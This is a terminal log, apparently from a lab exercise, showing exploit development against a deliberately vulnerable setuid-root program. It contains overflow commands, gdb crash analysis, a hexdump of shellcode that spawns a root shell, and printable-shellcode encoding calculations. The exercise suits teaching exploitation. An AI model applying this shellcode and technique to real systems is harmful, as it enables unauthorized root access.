root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o update_info update_info.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chown root ./update_info
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod u+s ./update_info
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info
Usage: ./update_info <id> <description>
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info OCP209 "Enforcement Droid"
[DEBUG]: desc argument is at 0xbffff8db
Updating product #OCP209 with description 'Enforcement Droid'
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "AAAA"x10') blah
[DEBUG]: desc argument is at 0xbffff8e8
Speicherzugriffsfehler (Speicherabzug geschrieben)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat ./shellcode.bin)
Fatal: description argument can only contain printable bytes

 

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./update_info
Reading symbols from /home/tomovic/Dokumente/hack/update_info...done.
(gdb) run $(perl -e 'print "\xcb\xf9\xff\xbf"x10') blah
Starting program: /home/tomovic/Dokumente/hack/update_info $(perl -e 'print "\xcb\xf9\xff\xbf"x10') blah
[DEBUG]: desc argument is at 0xbffff8d8

Program received signal SIGSEGV, Segmentation fault.
0xb7e5f6a5 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) i r eip
eip            0xb7e5f6a5 0xb7e5f6a5 <vfprintf+19909>
(gdb) x/s $eip
0xb7e5f6a5 <vfprintf+19909>: "\362\256Džx\373\377\377"

(gdb) print 0 - 0x39393333 - 0x72727550 - 0x54545421
$1 = 860
(gdb) quit


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C ./shellcode.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o printable_helper printable_helper.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./printable_helper 0 0x80cde189
calculating printable values to subtract from EAX..

start: 0x00000000

     - 0x3465652d
     - 0x25656525
     - 0x25675425
-------------------
end:   0x80cde189
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C ./shellcode.
shellcode.bin  shellcode.s   
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C ./shellcode.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
00000023
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./printable_helper 0x80cde189 0x53e28951
calculating printable values to subtract from EAX..

start: 0x80cde189

     - 0x52526d52
     - 0x6152786d
     - 0x79467279
-------------------
end:   0x53e28951
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   
